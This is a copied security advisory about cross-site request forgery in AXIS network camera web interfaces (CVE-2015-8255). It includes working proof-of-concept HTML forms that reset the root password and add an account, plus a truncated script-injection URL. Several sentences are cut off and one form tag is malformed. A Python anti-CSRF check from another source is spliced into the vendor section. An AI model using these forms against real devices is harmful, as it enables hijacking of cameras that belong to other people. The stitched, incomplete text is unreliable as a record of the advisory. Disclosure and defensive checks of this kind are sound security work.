Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030163

Below is a copy:

AXIS Communications Cross Site Request Forgery

0RWELLL4BS security advisory
PGP: 79A6CCC0

Advisory Information
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Session Management control [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1

Technical Details
Because of the (bad) design of this kind of device (actually one of the big
problems of IoT), the embedded web application does not verify whether a
valid request was intentionally provided by the user who submitted the
request.

#-> Setting root password to W!nst0n

  <!-- CSRF PoC  Orwelllabs -->
    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="user" value="root" />
      <input type="hidden" name="pwd" value="w!nst0n" />
      <input type="hidden" name="comment" value="Administrator" />
      <input type="submit" value="Submit request" />
    </form>

#-> Adding new credential SmithW:W!nst0n

  <!-- CSRF PoC - Orwelllabs -->
    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="user" value="SmithW" />
      <input type="hidden" name="sgrp"
      <input type="hidden" name="pwd" value="W!nst0n" />
      <input type="hidden" name="grp" value="users" />
      <input type="hidden" name="comment" value="WebUser" />
      <input type="submit" value="Submit request" />
    </form>

#-> Deleting an app directly via CSRF (axis_update.shtml)

http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="

[And many actions allowed to a user [all of them?] can be forged in this

Vendor Information, Solutions and Workarounds
Well, this is a very old design problem of this kind of device, nothing new
to say about that.
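
The check that Technical Details describes as missing, shown as an added example (not Orwelllabs' or AXIS's code): an account-management handler accepts a request only if it is a POST, comes from the device's own origin, and carries a per-session token. The function names, the csrf_token parameter, and the sample host, key and session id are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

def issue_token(session_key: bytes, session_id: str) -> str:
    """Per-session anti-CSRF token to embed in the device's own admin forms."""
    return hmac.new(session_key, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers: dict, device_host: str) -> bool:
    """True only if Origin (or, failing that, Referer) names the device itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).netloc.lower() == device_host.lower()

def check_admin_request(method, headers, params, session_key, session_id, device_host):
    """Return (allowed, reason) for a request to an account-management endpoint."""
    if method != "POST":
        return False, "admin action requires POST"
    if not same_origin(headers, device_host):
        return False, "cross-origin or missing Origin/Referer"
    supplied = params.get("csrf_token", "").encode()
    expected = issue_token(session_key, session_id).encode()
    if not hmac.compare_digest(supplied, expected):  # constant-time comparison
        return False, "missing or invalid CSRF token"
    return True, "ok"

# Constructed sample values (not from the advisory).
SESSION_KEY = b"constructed-per-boot-secret"
SESSION_ID = "constructed-session-id"
DEVICE_HOST = "camera.example"
# Shape of the forged request the first form above produces: no method
# attribute (so GET), sent from another site, no token. Password omitted.
FORGED_PARAMS = {"action": "update", "user": "root", "comment": "Administrator"}
FORGED_HEADERS = {"Referer": "http://other-site.example/page.html"}

if __name__ == "__main__":
    print(check_admin_request("GET", FORGED_HEADERS, FORGED_PARAMS,
                              SESSION_KEY, SESSION_ID, DEVICE_HOST))
    legit = dict(FORGED_PARAMS, csrf_token=issue_token(SESSION_KEY, SESSION_ID))
    print(check_admin_request("POST", {"Origin": "http://" + DEVICE_HOST}, legit,
                              SESSION_KEY, SESSION_ID, DEVICE_HOST))
```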

These vulnerabilities have been discovered and published by Orwelllabs.

Legal Notices
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this

About Orwelllabs
